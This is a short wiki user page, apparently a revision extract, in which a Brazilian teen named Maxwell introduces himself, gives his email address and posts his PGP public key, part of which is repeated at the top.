zAMDpY+zHtpe0gjScnDVrKZDRwd6qzO58pXfEovfrfRBiX8/lNVORqJ5lwyi1IYP
ANTyFO3QNYqw7LGwo9AagSdJOSIHnNJw4r1IAZkY9OxQROfqxf1B5S4ABDPdIYu3
z1RFQCI9cppz0kgzK8omSCrSG1vnH8a/eqiJtqmq9P/Db6U3hnaWZGXOtwhGhr9C
P3BH1TL7DwdrQ3eMj4B9MWVmPwpv4WNRXYMbplEFgdsF3tsNuB5NG+QDx3CsIszo
eqsfX50ZrmLYx6U4oZJYi4XVUoXCjDTetjaBcCiyb+F19ARJSXemEQOgk7QhdwGp
L29+vN9SH9S+MIKU8Z2dZFrtkNn9GhWOrevkrfzHF2d5m6Z9klnSLG26qOghKrM/
xmjvDF+a0m9LZ6YozBsc/0CbnYXHnJOl6ikQv+2NUdyyt1Tymp/E1s6PABEBAAHC
wPwEGAEIACYWIQS0aN9pMNPmSF3bTmtVJAGLQ7HgpAUCZFSU8gUJEswDAAIbDAAK
CRBVJAGLQ7HgpHNxC/9AmMg/hr/Do54vzCu8UhDBWLVChjNzYc7yy5XJw3+uXTf+
hOS7VjZuXXYeFh1RoldjQSnEDduWcgH/18znzChs7FiAvWq4sMd2ygJ9pNIBjz4W
WZPowqZ+0vLIMWlqfWLowk1NJRiOOAS+HApM/gdqtgGtZkHjnEm+D93Xuje8TLGN
z3sJVMaqOCldDywZjq5iLAAh2uUdDNdgE8BKH6EodTiDkKCcdm2vNfdF51wec8cJ
Zox2VCckeAae3q3SzdZ45c5MdJo7SLwnNhV/TqVAoalcXe1WYDOQDdMGD4oz2aUZ
OlS3OynCaHVsNVRTqeiamrUhnSA5j50IqrOuEVnRuRlO4Cg3pxTJZiz++tc/Tc9g
vbQ2tkt+tUxF9AS+R3h/6Fv/KW+2c2lwF0vKY6NZ8r63BzPKM9t7EOrlAa1pt1Mv
SE978iuv8fBdW99JRWeCw0aUJLdmDQuNvTJTj93XO9cogxspq09NnGAnePf3yfqi
sd9TDUR9uRxdjtpAbxw=
=yYrX
-----END PGP PUBLIC KEY BLOCK-----</nowiki>
Ⓐ

User:Mxwgn

2023-05-06T00:53:02Z

Mxwgn: Creating my user page on the wiki for the first time.

Hello, i'm maxwell. a brazilian teen representating latin american people.
if you need to get in touch, write me an e-mail.

maxwell@disroot.org

<nowiki>-----BEGIN PGP PUBLIC KEY BLOCK-----

xsDNBGRUlO8BDADCsmxWF0pVWlTISHBGosjSLf1ttRuwGUw9wbV8QNhJnic+civH
5Yv8wMfUQ6AXmsPAxinf9XjbQhA6zIqBUXiulVu24+iULx9frpGBogUzz1UtKADa
ij3IYMqEIGJiSUF/8Pi5en+A9IREph4fQliZUdXLDdVNEkyEAys43Bn9eCn/1H4C
RfwORCaM1ThXyV5dAAV5BOZNoBVzCO63WPpXdNKS4FIxPIAjYI4lIj9XG3NOUCw1
lXDL3SlBuc9rfPtn6cjh0O0MNC+TaU1XTwWFWZQXR/qLQKhjqyTVL4kdREkizIfC
siDzvgkpogeuWNcRajkV0ycBEr+5Qc2Tu71PS4kubzLmXdXdqcLjtctl/0s6cxC8
3nAx0O3JPhZ+sulPi+Dq/NleZJtznv0mDAmfL4UWJiwhlYb5HjSLOr50yRcvVMTr
kaYBaoU9zKgVxHlV3DJPC+IRDe4TjTp0RojPk0wSiAhViDOiB8SxKl+yy6Dyz45V
HqGA6u8tvvDGbCUAEQEAAc0dbWF4d2VsbCA8bWF4d2VsbEBkaXNyb290Lm9yZz7C
wQ0EEwEIADcWIQS0aN9pMNPmSF3bTmtVJAGLQ7HgpAUCZFSU8AUJEswDAAIbAwQL
CQgHBRUICQoLBRYCAwEAAAoJEFUkAYtDseCkaVcL/iLe8RV+dL9Z04r7yP53KbA8
hJy8U+SdLK9RrNJASuQ9Il4ZjXJnY02AcZl4szr5XxWwOQvJV0iwE8wO69I3MF1S
EzcjOVn1X36aK21vTrIZHXjVF6rVfV7op4ZHdA4OEdFYYe+C51Xe6jBhA3IMZRan
nuUsCGrpoad/O7FjHYpuaikzLMOxFhCFuEYHmEotYRKRN0xVoYWg/dX5EZL72XmV
CPqSvkw30WaK8P47dmlJPIFGAwP5nyNlBtBJTNS+ToK1Mitpt4e7EEGdGotIVCVL
zzkgA5fIREtkLB7LJs+RQ7N4A43GHDQx8Q9h3LBgpmW5vrjlKdei+Dwyd1LdDV8q
0kpgS7vSphUoxDi3EmvDOqTSjc8QA0Y9Igy8xCJDZ+Uvj1JayvnYyk2/5UgsJl8D
W/d8VoSgTyZxEDRg5E+MTuAQ7OalYWtQtDaQY1Ddgefqnzx5cqF6zLry/jG7jhJp
xgWbo8aohFevr0NgqU9l58FWmK9Tr5PHpxjb7HaEOs7AzQRkVJTwAQwA5CpI8o0s
xIeNKv5HsEmc2wpYAP7Pu+MsuxhpRhKGLpq66jSPgIM9hzoT5zVviLy0aLtW8Ol/
zAMDpY+zHtpe0gjScnDVrKZDRwd6qzO58pXfEovfrfRBiX8/lNVORqJ5lwyi1IYP
ANTyFO3QNYqw7LGwo9AagSdJOSIHnNJw4r1IAZkY9OxQROfqxf1B5S4ABDPdIYu3
z1RFQCI9cppz0kgzK8omSCrSG1vnH8a/eqiJtqmq9P/Db6U3hnaWZGXOtwhGhr9C
P3BH1TL7DwdrQ3eMj4B9MWVmPwpv4WNRXYMbplEFgdsF3tsNuB5NG+QDx3CsIszo
eqsfX50ZrmLYx6U4oZJYi4XVUoXCjDTetjaBcCiyb+F19ARJSXemEQOgk7QhdwGp
L29+vN9SH9S+MIKU8Z2dZFrtkNn9GhWOrevkrfzHF2d5m6Z9klnSLG26qOghKrM/
xmjvDF+a0m9LZ6YozBsc/0CbnYXHnJOl6ikQv+2NUdyyt1Tymp/E1s6PABEBAAHC
wPwEGAEIACYWIQS0aN9pMNPmSF3bTmtVJAGLQ7HgpAUCZFSU8gUJEswDAAIbDAAK
CRBVJAGLQ7HgpHNxC/9AmMg/hr/Do54vzCu8UhDBWLVChjNzYc7yy5XJw3+uXTf+
hOS7VjZuXXYeFh1RoldjQSnEDduWcgH/18znzChs7FiAvWq4sMd2ygJ9pNIBjz4W
WZPowqZ+0vLIMWlqfWLowk1NJRiOOAS+HApM/gdqtgGtZkHjnEm+D93Xuje8TLGN
z3sJVMaqOCldDywZjq5iLAAh2uUdDNdgE8BKH6EodTiDkKCcdm2vNfdF51wec8cJ
Zox2VCckeAae3q3SzdZ45c5MdJo7SLwnNhV/TqVAoalcXe1WYDOQDdMGD4oz2aUZ
OlS3OynCaHVsNVRTqeiamrUhnSA5j50IqrOuEVnRuRlO4Cg3pxTJZiz++tc/Tc9g
vbQ2tkt+tUxF9AS+R3h/6Fv/KW+2c2lwF0vKY6NZ8r63BzPKM9t7EOrlAa1pt1Mv
SE978iuv8fBdW99JRWeCw0aUJLdmDQuNvTJTj93XO9cogxspq09NnGAnePf3yfqi
sd9TDUR9uRxdjtpAbxw=
=yYrX
-----END PGP PUBLIC KEY BLOCK-----</nowiki>
Ⓐ